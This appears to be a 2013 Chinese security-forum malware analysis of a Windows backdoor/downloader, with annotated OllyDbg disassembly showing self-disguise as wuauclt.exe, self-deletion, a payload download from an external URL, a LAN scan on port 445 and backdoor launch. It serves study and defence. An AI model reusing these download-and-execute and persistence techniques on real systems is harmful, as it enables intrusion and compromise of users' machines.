本帖最后由 JoyChou 于 2013-9-25 17:32 编辑
//Author: JoyChou //Date: 2013年9月24日 23:37:23
病毒名称: Backdoor/Win32.Wuca.bj
病毒类型: 后门
文件 MD5: 2A1AEF106795864CA9DB643A116807DC
文件长度: 9,728 字节
感染系统: Windows98以上版本
加壳类型: UPX 0.89.6 - 1.02 / 1.05 - 1.24
开发工具: Microsoft Visual C++ 6.0
病毒执行过程: 太懒,没有画图。 运行样本过后,首先检测是否有当前进程,如果有就继续执行下面功能,没有就退出(当然又没做隐藏进程的手脚,双击了当然有),接着病毒提升自身权限 然后判断当前进程的路径是否是"C:\WINDOWS\Fonts\wuauclt.exe"
如果不是: 在C:\Windows下生成一个sa.exe目录,并且设置改目录属性为隐藏&&只读 执行cmd命令cmd /c taskkill /im wuauclt.exe /f 结束wuauclt.exe进程(Wuauclt.exe是Windows自动升级管理程序,该进程会不断在线检测更新,删除该进程将使计算机无法得到最新更新信息),便以后的伪装 复制当前样本到C:\WINDOWS\Fonts\wuauclt.exe 并设为隐藏属性(伪装为Windows自动升级管理程序) 执行cmd命令 cmd /c del "C:\Documents and Settings\Administrator\桌面\1.exe"删除当前进程,达到隐密性 退出程序 over
如果是(此时找到C:\WINDOWS\Fonts\wuauclt.exe文件,此时直接找是找不到的,利用文件搜索功能查找,并用od调试) 加载系统动态库文件“urlmon.dll”,并调用该库里的"URLDownloadToFileA"函数,连接网络http://360.1s.fr/ps.jpg下载病毒文件并保存到C:\WINDOWS\Fonts\gern.fon目录下 判断该目录文件是否存在,如果不存在则弹出一个消息框退出,如存在则创建多个线程,因为下载不成,线程里面很多的功能都不能实现。主要有设置创建启动项,运行一个远程溢出软件和一个svchost.exe文件
详细分析:
贴点代码
[AppleScript] 纯文本查看 复制代码 00402130 >/$ 55 push ebp
00402131 |. 8BEC mov ebp,esp
00402133 |. 81EC AC030000 sub esp,0x3AC
00402139 |. 53 push ebx
0040213A |. 56 push esi
0040213B |. 57 push edi
0040213C |. E8 3FF8FFFF call wuauclt.00401980 ; 遍历进程
00402141 |. 85C0 test eax,eax
00402143 |. 74 08 je Xwuauclt.0040214D
00402145 |. 6A 00 push 0x0 ; /ExitCode = 0
00402147 |. FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
0040214D |> E8 7EF4FFFF call wuauclt.004015D0 ; 提权
00402152 |. 8D85 54FCFFFF lea eax,[local.235]
00402158 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040215D |. 50 push eax ; |PathBuffer
0040215E |. 6A 00 push 0x0 ; |hModule = NULL
00402160 |. FF15 5C304000 call dword ptr ds:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00402166 |. 8D8D 5CFEFFFF lea ecx,[local.105]
0040216C |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
00402171 |. 51 push ecx ; |Buffer
00402172 |. FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402178 |. BF 047D4000 mov edi,wuauclt.00407D04 ; ASCII "\Fonts\wuauclt.exe"
0040217D |. 83C9 FF or ecx,0xFFFFFFFF
00402180 |. 33C0 xor eax,eax
00402182 |. 8D95 5CFEFFFF lea edx,[local.105] ; edx:C:\windows
00402188 |. F2:AE repne scas byte ptr es:[edi]
0040218A |. F7D1 not ecx ; \Fonts\wuauclt.exe长度0x13
0040218C |. 2BF9 sub edi,ecx
0040218E |. 68 687F4000 push wuauclt.00407F68 ; ASCII "ont"
00402193 |. 8BF7 mov esi,edi
00402195 |. 8BD9 mov ebx,ecx
00402197 |. 8BFA mov edi,edx
00402199 |. 83C9 FF or ecx,0xFFFFFFFF
0040219C |. F2:AE repne scas byte ptr es:[edi]
0040219E |. 8BCB mov ecx,ebx
004021A0 |. 4F dec edi
004021A1 |. C1E9 02 shr ecx,0x2
004021A4 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004021A6 |. 8BCB mov ecx,ebx
004021A8 |. 8D85 54FCFFFF lea eax,[local.235]
004021AE |. 83E1 03 and ecx,0x3
004021B1 |. 50 push eax
004021B2 |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
004021B4 |. E8 27030000 call wuauclt.004024E0
004021B9 |. 83C4 08 add esp,0x8
004021BC |. 85C0 test eax,eax
004021BE |. 0F84 DA010000 je wuauclt.0040239E
004021C4 |. 33C9 xor ecx,ecx
004021C6 |. 8D55 EC lea edx,[local.5]
004021C9 |. 894D ED mov dword ptr ss:[ebp-0x13],ecx
004021CC |. 52 push edx
004021CD |. 894D F1 mov dword ptr ss:[ebp-0xF],ecx
004021D0 |. 68 B87D4000 push wuauclt.00407DB8 ; ASCII "khbced$Zbb"
004021D5 |. 894D F5 mov dword ptr ss:[ebp-0xB],ecx
004021D8 |. C645 EC 00 mov byte ptr ss:[ebp-0x14],0x0
004021DC |. 894D F9 mov dword ptr ss:[ebp-0x7],ecx
004021DF |. 66:894D FD mov word ptr ss:[ebp-0x3],cx
004021E3 |. 884D FF mov byte ptr ss:[ebp-0x1],cl
004021E6 |. E8 25F1FFFF call wuauclt.00401310 ; 字符串解密
004021EB |. 83C4 08 add esp,0x8
004021EE |. 90 nop
004021EF |. 90 nop
004021F0 |. 90 nop
004021F1 |. 90 nop
004021F2 |. 90 nop
004021F3 |. 90 nop
004021F4 |. 90 nop
004021F5 |. 90 nop
004021F6 |. 90 nop
004021F7 |. 90 nop
004021F8 |. 90 nop
004021F9 |. 90 nop
004021FA |. 90 nop
004021FB |. 90 nop
004021FC |. 90 nop
004021FD |. 90 nop
004021FE |. 90 nop
004021FF |. 90 nop
00402200 |. 90 nop
00402201 |. 90 nop
00402202 |. 90 nop
00402203 |. 90 nop
00402204 |. 90 nop
00402205 |. 90 nop
00402206 |. 90 nop
00402207 |. 90 nop
00402208 |. 90 nop
00402209 |. 90 nop
0040220A |. 90 nop
0040220B |. 90 nop
0040220C |. 90 nop
0040220D |. 90 nop
0040220E |. 90 nop
0040220F |. 90 nop
00402210 |. 90 nop
00402211 |. 90 nop
00402212 |. 90 nop
00402213 |. 90 nop
00402214 |. 90 nop
00402215 |. 90 nop
00402216 |. 8D45 EC lea eax,[local.5]
00402219 |. 50 push eax ; /FileName
0040221A |. FF15 38304000 call dword ptr ds:[<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402220 |. 8BD8 mov ebx,eax
00402222 |. B9 09000000 mov ecx,0x9
00402227 |. 33C0 xor eax,eax
00402229 |. 8D7D C5 lea edi,dword ptr ss:[ebp-0x3B]
0040222C |. C645 C4 00 mov byte ptr ss:[ebp-0x3C],0x0
00402230 |. C685 60FFFFFF>mov byte ptr ss:[ebp-0xA0],0x0
00402237 |. F3:AB rep stos dword ptr es:[edi]
00402239 |. 66:AB stos word ptr es:[edi]
0040223B |. AA stos byte ptr es:[edi]
0040223C |. B9 18000000 mov ecx,0x18
00402241 |. 33C0 xor eax,eax
00402243 |. 8DBD 61FFFFFF lea edi,dword ptr ss:[ebp-0x9F]
00402249 |. F3:AB rep stos dword ptr es:[edi]
0040224B |. 66:AB stos word ptr es:[edi]
0040224D |. 8D4D C4 lea ecx,[local.15]
00402250 |. 51 push ecx
00402251 |. 68 A47D4000 push wuauclt.00407DA4 ; ASCII "KHB:emdbeWZJe<_b[7"
00402256 |. AA stos byte ptr es:[edi]
00402257 |. E8 B4F0FFFF call wuauclt.00401310
0040225C |. 83C4 08 add esp,0x8
0040225F |. 8D55 C4 lea edx,[local.15]
00402262 |. 52 push edx ; /URLDownloadToFileA
00402263 |. 53 push ebx ; |urlmon.dll
00402264 |. FF15 34304000 call dword ptr ds:[<&KERNEL32.GetProcAdd>; \GetProcAddress
0040226A |. A3 D88C4000 mov dword ptr ds:[0x408CD8],eax
0040226F |. 8D85 58FDFFFF lea eax,[local.170]
00402275 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040227A |. 50 push eax ; |Buffer
0040227B |. FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402281 |. BF D47C4000 mov edi,wuauclt.00407CD4 ; ASCII "\Fonts\gern.fon"
00402286 |. 83C9 FF or ecx,0xFFFFFFFF
00402289 |. 33C0 xor eax,eax
0040228B |. 8D95 58FDFFFF lea edx,[local.170]
00402291 |. F2:AE repne scas byte ptr es:[edi]
00402293 |. F7D1 not ecx
00402295 |. 2BF9 sub edi,ecx
00402297 |. 8BF7 mov esi,edi
00402299 |. 8BFA mov edi,edx
0040229B |. 8BD1 mov edx,ecx
0040229D |. 83C9 FF or ecx,0xFFFFFFFF
004022A0 |. F2:AE repne scas byte ptr es:[edi]
004022A2 |. 8BCA mov ecx,edx
004022A4 |. 4F dec edi
004022A5 |. C1E9 02 shr ecx,0x2
004022A8 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004022AA |. 8BCA mov ecx,edx
004022AC |. 8D85 60FFFFFF lea eax,[local.40]
004022B2 |. 83E1 03 and ecx,0x3
004022B5 |. 50 push eax
004022B6 |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
004022B8 |. 68 507F4000 push wuauclt.00407F50 ; ASCII "^jjf0%%),&$'i$\h%fi$`f]"
004022BD |. E8 4EF0FFFF call wuauclt.00401310 ; [url=http://360.1s.fr/ps.jpg]http://360.1s.fr/ps.jpg[/url]
004022C2 |. 83C4 08 add esp,0x8
004022C5 |. 8D8D 58FDFFFF lea ecx,[local.170]
004022CB |. 8D95 60FFFFFF lea edx,[local.40]
004022D1 |. 6A 00 push 0x0
004022D3 |. 6A 00 push 0x0
004022D5 |. 51 push ecx ; C:\WINDOWS\Fonts\gern.fon
004022D6 |. 52 push edx ; [url=http://360.1s.fr/ps.jpg]http://360.1s.fr/ps.jpg[/url]
004022D7 |. 6A 00 push 0x0
004022D9 |. FF15 D88C4000 call dword ptr ds:[0x408CD8]
004022DF 68 10270000 push 0x2710
004022E4 |. FF15 88304000 call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
004022EA |. 53 push ebx ; /hLibModule
004022EB |. FF15 30304000 call dword ptr ds:[<&KERNEL32.FreeLibrar>; \FreeLibrary
004022F1 |. 8D85 58FDFFFF lea eax,[local.170]
004022F7 |. 50 push eax ; /FileName
004022F8 |. FF15 2C304000 call dword ptr ds:[<&KERNEL32.GetFileAtt>; \GetFileAttributesA
004022FE |. 83F8 FF cmp eax,-0x1
00402301 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00402303 |. 75 1E jnz Xwuauclt.00402323 ; |
00402305 |. 68 487F4000 push wuauclt.00407F48 ; |Title = "http"
0040230A |. 68 3C7F4000 push wuauclt.00407F3C ; |Text = "qq935623508"
0040230F 6A FF push -0x1
00402311 |. FF15 B0304000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00402317 |. 5F pop edi
00402318 |. 5E pop esi
00402319 |. B8 01000000 mov eax,0x1
0040231E |. 5B pop ebx
0040231F |. 8BE5 mov esp,ebp
00402321 |. 5D pop ebp
00402322 |. C3 retn
00402323 |> 8B35 58304000 mov esi,dword ptr ds:[<&KERNEL32.CreateT>; |kernel32.CreateThread
00402329 |. 6A 00 push 0x0 ; |CreationFlags = 0
0040232B |. 6A 00 push 0x0 ; |pThreadParm = NULL
0040232D |. 68 801F4000 push wuauclt.00401F80 ; |ThreadFunction = wuauclt.00401F80
00402332 |. 6A 00 push 0x0 ; |StackSize = 0
00402334 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402336 |. FFD6 call esi ; \CreateThread
00402338 |. 6A 00 push 0x0 ; /pThreadId = NULL
0040233A |. 6A 00 push 0x0 ; |CreationFlags = 0
0040233C |. 6A 00 push 0x0 ; |pThreadParm = NULL
0040233E |. 68 301C4000 push wuauclt.00401C30 ; |ThreadFunction = wuauclt.00401C30
00402343 |. 6A 00 push 0x0 ; |StackSize = 0
00402345 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402347 |. FFD6 call esi ; \CreateThread
00402349 |. 6A 00 push 0x0 ; /pThreadId = NULL
0040234B |. 6A 00 push 0x0 ; |CreationFlags = 0
0040234D |. 6A 00 push 0x0 ; |pThreadParm = NULL
0040234F |. 68 F0194000 push wuauclt.004019F0 ; |ThreadFunction = wuauclt.004019F0
00402354 |. 6A 00 push 0x0 ; |StackSize = 0
00402356 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402358 |. FFD6 call esi ; \CreateThread
0040235A |. 6A 00 push 0x0 ; /pThreadId = NULL
0040235C |. 6A 00 push 0x0 ; |CreationFlags = 0
0040235E |. 6A 00 push 0x0 ; |pThreadParm = NULL
00402360 |. 68 40164000 push wuauclt.00401640 ; |ThreadFunction = wuauclt.00401640
00402365 |. 6A 00 push 0x0 ; |StackSize = 0
00402367 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402369 |. FFD6 call esi ; \CreateThread
0040236B |. 6A 00 push 0x0 ; /pThreadId = NULL
0040236D |. 6A 00 push 0x0 ; |CreationFlags = 0
0040236F |. 6A 00 push 0x0 ; |pThreadParm = NULL
00402371 |. 68 50174000 push wuauclt.00401750 ; |ThreadFunction = wuauclt.00401750
00402376 |. 6A 00 push 0x0 ; |StackSize = 0
00402378 |. 6A 00 push 0x0 ; |pSecurity = NULL
0040237A |. FFD6 call esi ; \CreateThread
0040237C |. 6A 00 push 0x0 ; /pThreadId = NULL
0040237E |. 6A 00 push 0x0 ; |CreationFlags = 0
00402380 |. 6A 00 push 0x0 ; |pThreadParm = NULL
00402382 |. 68 701D4000 push wuauclt.00401D70 ; |ThreadFunction = wuauclt.00401D70
00402387 |. 6A 00 push 0x0 ; |StackSize = 0
00402389 |. 6A 00 push 0x0 ; |pSecurity = NULL
0040238B |. FFD6 call esi ; \CreateThread
0040238D |. E8 CEF2FFFF call wuauclt.00401660 ; 设置启动项
00402392 |. 5F pop edi
00402393 |. 5E pop esi
00402394 |. B8 01000000 mov eax,0x1
00402399 |. 5B pop ebx
0040239A |. 8BE5 mov esp,ebp
0040239C |. 5D pop ebp
0040239D |. C3 retn
0040239E |> 68 307F4000 push wuauclt.00407F30 ; ASCII "C:\sa.exe"
004023A3 |. E8 4E020000 call wuauclt.004025F6 ; 创建目录
004023A8 |. 8B35 88304000 mov esi,dword ptr ds:[<&KERNEL32.Sleep>] ; kernel32.Sleep
004023AE |. 83C4 04 add esp,0x4
004023B1 |. 6A 64 push 0x64 ; /Timeout = 100. ms
004023B3 |. FFD6 call esi ; \Sleep
004023B5 |. 6A 03 push 0x3 ; /FileAttributes = READONLY|HIDDEN
004023B7 |. 68 307F4000 push wuauclt.00407F30 ; |FileName = "C:\sa.exe"
004023BC |. FF15 9C304000 call dword ptr ds:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
004023C2 |. 8B1D 28304000 mov ebx,dword ptr ds:[<&KERNEL32.WinExec>; kernel32.WinExec
004023C8 |. 6A 00 push 0x0 ; /ShowState = SW_HIDE
004023CA |. 68 0C7F4000 push wuauclt.00407F0C ; |CmdLine = "cmd /c taskkill /im wuauclt.exe /f"
004023CF |. FFD3 call ebx ; \WinExec
004023D1 |. 68 D0070000 push 0x7D0 ; /Timeout = 2000. ms
004023D6 |. FFD6 call esi ; \Sleep
004023D8 |. 8D8D 5CFEFFFF lea ecx,[local.105]
004023DE |. 6A 00 push 0x0 ; /FailIfExists = FALSE
004023E0 |. 8D95 54FCFFFF lea edx,[local.235] ; |
004023E6 |. 51 push ecx ; |NewFileName
004023E7 |. 52 push edx ; |ExistingFileName
004023E8 |. FF15 50304000 call dword ptr ds:[<&KERNEL32.CopyFileA>>; \CopyFileA
004023EE |. 68 A00F0000 push 0xFA0 ; /Timeout = 4000. ms
004023F3 |. FFD6 call esi ; \Sleep
004023F5 |. 8D85 5CFEFFFF lea eax,[local.105]
004023FB |. 6A 00 push 0x0 ; /ShowState = SW_HIDE
004023FD |. 50 push eax ; |CmdLine
004023FE |. FFD3 call ebx ; \WinExec
00402400 |. B9 18000000 mov ecx,0x18
00402405 |. 33C0 xor eax,eax
00402407 |. 8DBD 61FFFFFF lea edi,dword ptr ss:[ebp-0x9F]
0040240D |. C685 60FFFFFF>mov byte ptr ss:[ebp-0xA0],0x0
00402414 |. F3:AB rep stos dword ptr es:[edi]
00402416 |. 66:AB stos word ptr es:[edi]
00402418 |. AA stos byte ptr es:[edi]
00402419 |. BF 007F4000 mov edi,wuauclt.00407F00 ; ASCII "cmd /c del "
0040241E |. 83C9 FF or ecx,0xFFFFFFFF
00402421 |. 33C0 xor eax,eax
00402423 |. 8D95 60FFFFFF lea edx,[local.40]
00402429 |. F2:AE repne scas byte ptr es:[edi]
0040242B |. F7D1 not ecx
0040242D |. 2BF9 sub edi,ecx
0040242F |. 8BC1 mov eax,ecx
00402431 |. 8BF7 mov esi,edi
00402433 |. 8BFA mov edi,edx
00402435 |. C1E9 02 shr ecx,0x2
00402438 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040243A |. 8BC8 mov ecx,eax
0040243C |. 83E1 03 and ecx,0x3
0040243F |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
00402441 |. FF15 4C304000 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA
00402447 |. 8BF8 mov edi,eax
00402449 |. 83C9 FF or ecx,0xFFFFFFFF
0040244C |. 33C0 xor eax,eax
0040244E |. 8D95 60FFFFFF lea edx,[local.40]
00402454 |. F2:AE repne scas byte ptr es:[edi]
00402456 |. F7D1 not ecx
00402458 |. 2BF9 sub edi,ecx
0040245A |. 50 push eax ; /ShowState => SW_HIDE
0040245B |. 8BF7 mov esi,edi ; |
0040245D |. 8BFA mov edi,edx ; |
0040245F |. 8BD1 mov edx,ecx ; |
00402461 |. 83C9 FF or ecx,0xFFFFFFFF ; |
00402464 |. F2:AE repne scas byte ptr es:[edi] ; |
00402466 |. 8BCA mov ecx,edx ; |
00402468 |. 4F dec edi ; |
00402469 |. C1E9 02 shr ecx,0x2 ; |
0040246C |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>; |
0040246E |. 8BCA mov ecx,edx ; |
00402470 |. 8D85 60FFFFFF lea eax,[local.40] ; |
00402476 |. 83E1 03 and ecx,0x3 ; |
00402479 |. 50 push eax ; |CmdLine
0040247A |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>; |
0040247C |. FFD3 call ebx ; \WinExec
0040247E |. 6A 00 push 0x0 ; /ExitCode = 0
00402480 \. FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
401d70一个重要的线程回调函数
通过获取主机名再获取主机ip
[AppleScript] 纯文本查看 复制代码 00401D7E |. 8D85 FCFAFFFF lea eax,[local.321]
00401D84 |. 50 push eax ; /pWSAData
00401D85 |. 6A 02 push 0x2 ; |RequestedVersion = 2 (2.0.)
00401D87 |. E8 34070000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401D8C |. 85C0 test eax,eax
00401D8E |. 0F85 DA010000 jnz wuauclt.00401F6E
00401D94 |. 53 push ebx
00401D95 |. 56 push esi
00401D96 |. 57 push edi
00401D97 |. 8D8D 94FEFFFF lea ecx,[local.91]
00401D9D |. 68 FF000000 push 0xFF ; /BufSize = FF (255.)
00401DA2 |. 51 push ecx ; |Buffer
00401DA3 |. E8 30070000 call <jmp.&WS2_32.#57> ; \gethostname
00401DA8 |. 85C0 test eax,eax
00401DAA |. 0F85 AB010000 jnz wuauclt.00401F5B
00401DB0 |. 8D95 94FEFFFF lea edx,[local.91]
00401DB6 |. 52 push edx ; /Name
00401DB7 |. E8 16070000 call <jmp.&WS2_32.#52> ; \gethostbyname
00401DBC |. 85C0 test eax,eax
00401DBE |. 8945 F8 mov [local.2],eax
类似代码
[C++] 纯文本查看 复制代码 #include "StdAfx.h"
#include <stdio.h>
#include <windows.h>
#include <winSock2.H>
#pragma comment(lib, "WS2_32.lib") // 必须在头文件下面,否则报错
void main()
{
WORD wVersionRequested;//版本号
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(2, 2);//2.2版本的套接字
//加载套接字库,如果失败返回
err = WSAStartup(wVersionRequested, &wsaData); //必须要加载套接字库
if (err != 0)
{
return;
}
//判断高低字节是不是2,如果不是2.2的版本则退出
if (LOBYTE(wsaData.wVersion) != 2 ||
HIBYTE(wsaData.wVersion) != 2)
{
return;
}
char hostname[256] = {0};
gethostname(hostname, sizeof(hostname)); // 获取主机名
printf("%s\n", hostname);
PHOSTENT hostinfo;
char *ip = NULL;
if((hostinfo = gethostbyname(hostname)) != NULL) // 根据主机名获取主机信息
{
int nCount = 0;
while(hostinfo->h_addr_list[nCount])
{
ip = inet_ntoa (*(struct in_addr *)hostinfo->h_addr_list[nCount]);
printf("IP #%d: %s\n", ++nCount, ip);
}
}
WSACleanup();
fflush(stdin);
getchar();
return ;
}
192.168.160是我本机ip的前24位,循环256次,当然能循环到我的ip(不过为什么不直接获取32位ip呢 T_T~。)
初始化套接字,作为客服端依次连接192.168.160.0(最后一位依次加1,循环256次)
没有连接成功就执行后门explorer.exe程序,由此可见后门是一个服务端程序。
[AppleScript] 纯文本查看 复制代码 00401EB1 |. C745 FC 00000>mov [local.1],0x0
00401EB8 |> 8B45 F8 /mov eax,[local.2]
00401EBB |. 8B48 0C |mov ecx,dword ptr ds:[eax+0xC]
00401EBE |. 8B11 |mov edx,dword ptr ds:[ecx]
00401EC0 |. 8A4D FC |mov cl,byte ptr ss:[ebp-0x4]
00401EC3 |. 884A 03 |mov byte ptr ds:[edx+0x3],cl
00401EC6 |. 8B50 0C |mov edx,dword ptr ds:[eax+0xC]
00401EC9 |. 8B02 |mov eax,dword ptr ds:[edx]
00401ECB |. 8B08 |mov ecx,dword ptr ds:[eax]
00401ECD |. 51 |push ecx ; /in_addr
00401ECE |. E8 F9050000 |call <jmp.&WS2_32.#12> ; \inet_ntoa
00401ED3 |. 8BD8 |mov ebx,eax
00401ED5 |. 53 |push ebx
00401ED6 |. E8 C5FCFFFF |call wuauclt.00401BA0 ; 初始化套接字,作为客服端依次连接192.168.160.0(最后一位依次加1,循环256次)
00401EDB |. 83C4 04 |add esp,0x4
00401EDE |. 84C0 |test al,al
00401EE0 |. 74 67 |je Xwuauclt.00401F49 ; 连接成功就跳转
00401EE2 |. BF 547E4000 |mov edi,wuauclt.00407E54
00401EE7 |. 83C9 FF |or ecx,0xFFFFFFFF
00401EEA |. 33C0 |xor eax,eax
00401EEC |. F2:AE |repne scas byte ptr es:[edi]
00401EEE |. F7D1 |not ecx
00401EF0 |. 2BF9 |sub edi,ecx
00401EF2 |. 50 |push eax ; /IsShown => 0
00401EF3 |. 8BF7 |mov esi,edi ; |
00401EF5 |. 8BD1 |mov edx,ecx ; |
00401EF7 |. 8BFB |mov edi,ebx ; |
00401EF9 |. 83C9 FF |or ecx,0xFFFFFFFF ; |
00401EFC |. F2:AE |repne scas byte ptr es:[edi] ; |
00401EFE |. 8BCA |mov ecx,edx ; |
00401F00 |. 4F |dec edi ; |
00401F01 |. C1E9 02 |shr ecx,0x2 ; |
00401F04 |. F3:A5 |rep movs dword ptr es:[edi],dword ptr d>; |
00401F06 |. 8BCA |mov ecx,edx ; |
00401F08 |. 50 |push eax ; |DefDir => NULL
00401F09 |. 83E1 03 |and ecx,0x3 ; |
00401F0C |. 53 |push ebx ; |Parameters
00401F0D |. F3:A4 |rep movs byte ptr es:[edi],byte ptr ds:>; |
00401F0F |. 8D7D 94 |lea edi,[local.27] ; |
00401F12 |. 83C9 FF |or ecx,0xFFFFFFFF ; |
00401F15 |. F2:AE |repne scas byte ptr es:[edi] ; |
00401F17 |. F7D1 |not ecx ; |
00401F19 |. 2BF9 |sub edi,ecx ; |
00401F1B |. 8BF7 |mov esi,edi ; |
00401F1D |. 8BD1 |mov edx,ecx ; |
00401F1F |. 8BFB |mov edi,ebx ; |
00401F21 |. 83C9 FF |or ecx,0xFFFFFFFF ; |
00401F24 |. F2:AE |repne scas byte ptr es:[edi] ; |
00401F26 |. 8BCA |mov ecx,edx ; |
00401F28 |. 4F |dec edi ; |
00401F29 |. C1E9 02 |shr ecx,0x2 ; |
00401F2C |. F3:A5 |rep movs dword ptr es:[edi],dword ptr d>; |
00401F2E |. 8BCA |mov ecx,edx ; |
00401F30 |. 8D85 90FDFFFF |lea eax,[local.156] ; |
00401F36 |. 83E1 03 |and ecx,0x3 ; |
00401F39 |. 50 |push eax ; |FileName
00401F3A |. 68 C47D4000 |push wuauclt.00407DC4 ; |Operation = "open"
00401F3F |. 6A 00 |push 0x0 ; |hWnd = NULL
00401F41 |. F3:A4 |rep movs byte ptr es:[edi],byte ptr ds:>; |
00401F43 |. FF15 A8304000 |call dword ptr ds:[<&SHELL32.ShellExecu>; \ShellExecuteA //执行后门
00401F49 |> 8B45 FC |mov eax,[local.1]
00401F4C |. 40 |inc eax
00401F4D |. 3D 00010000 |cmp eax,0x100 ; 循环次数16*16为256次,0到255
00401F52 |. 8945 FC |mov [local.1],eax
00401F55 |.^ 0F8C 5DFFFFFF \jl wuauclt.00401EB8
00401F5B |> E8 66050000 call <jmp.&WS2_32.#116> ; [WSACleanup
初始化套接字00401ED6 call 00401BA0
[AppleScript] 纯文本查看 复制代码 00401BA0 /$ 81EC A0010000 sub esp,0x1A0
00401BA6 |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
00401BAA |. 56 push esi
00401BAB |. 50 push eax ; /pWSAData
00401BAC |. 68 01010000 push 0x101 ; |RequestedVersion = 101 (1.1.)
00401BB1 |. E8 0A090000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401BB6 |. 85C0 test eax,eax
00401BB8 |. 74 0A je Xwuauclt.00401BC4
00401BBA |. 32C0 xor al,al
00401BBC |. 5E pop esi
00401BBD |. 81C4 A0010000 add esp,0x1A0
00401BC3 |. C3 retn
00401BC4 |> 6A 06 push 0x6 ; /Protocol = IPPROTO_TCP
00401BC6 |. 6A 01 push 0x1 ; |Type = SOCK_STREAM
00401BC8 |. 6A 02 push 0x2 ; |Family = AF_INET
00401BCA |. E8 EB080000 call <jmp.&WS2_32.#23> ; \socket
00401BCF |. 8BF0 mov esi,eax
00401BD1 |. 83FE FF cmp esi,-0x1
00401BD4 |. 75 10 jnz Xwuauclt.00401BE6
00401BD6 |. 50 push eax ; /Socket
00401BD7 |. E8 D8080000 call <jmp.&WS2_32.#3> ; \closesocket
00401BDC |. 32C0 xor al,al
00401BDE |. 5E pop esi
00401BDF |. 81C4 A0010000 add esp,0x1A0
00401BE5 |. C3 retn
00401BE6 |> 8B8C24 A80100>mov ecx,dword ptr ss:[esp+0x1A8]
00401BED |. 66:C74424 04 >mov word ptr ss:[esp+0x4],0x2
00401BF4 |. 51 push ecx ; /pAddr
00401BF5 |. E8 B4080000 call <jmp.&WS2_32.#11> ; \inet_addr
00401BFA |. 68 BD010000 push 0x1BD ; /NetShort = 1BD
00401BFF |. 894424 0C mov dword ptr ss:[esp+0xC],eax ; |
00401C03 |. E8 A0080000 call <jmp.&WS2_32.#9> ; \ntohs
00401C08 |. 8D5424 04 lea edx,dword ptr ss:[esp+0x4]
00401C0C |. 6A 10 push 0x10 ; /AddrLen = 10 (16.)
00401C0E |. 52 push edx ; |pSockAddr
00401C0F |. 56 push esi ; |Socket
00401C10 |. 66:894424 12 mov word ptr ss:[esp+0x12],ax ; |
00401C15 |. E8 88080000 call <jmp.&WS2_32.#4> ; \connect
00401C1A |. 85C0 test eax,eax ; 连接成功返回0
00401C1C |. 0F94C0 sete al ; al成功为0
00401C1F |. 5E pop esi
00401C20 |. 81C4 A0010000 add esp,0x1A0
00401C26 \. C3 retn
简单的总结下: C:\WINDOWS\Fonts\gern.fon文件就是一个XX.INI文件,利用GetPrivateProfileStringA 获取文件内容,该文件存在各种URL下载链接,以及各种充当比较功能的字符串。explorer.exeJ就是后门程序。远程溢出的一个比较老的exp
PS:一个下载者后门,还是比较简单,重要的是把流程分析清楚,这样才不会在api中迷失。适合想分析病毒的new hand,基本都是api,以前分析过的,今天无意看到,分享一下。确实太多功能都不能实现,分析得确实比较蛋疼。能力强点建议试着玩玩强点的毒。
贴图比较麻烦,所以放文档了,什么时候DZ也可以直接复制图片进去T_T~~ 详细看idb和文档吧。
附件:
Backdoor.rar
(1.81 MB, 下载次数: 64)
|
发表于 2013-9-24 23:53
发表于 2013-9-25 08:50
|
发表于 2013-9-25 09:59
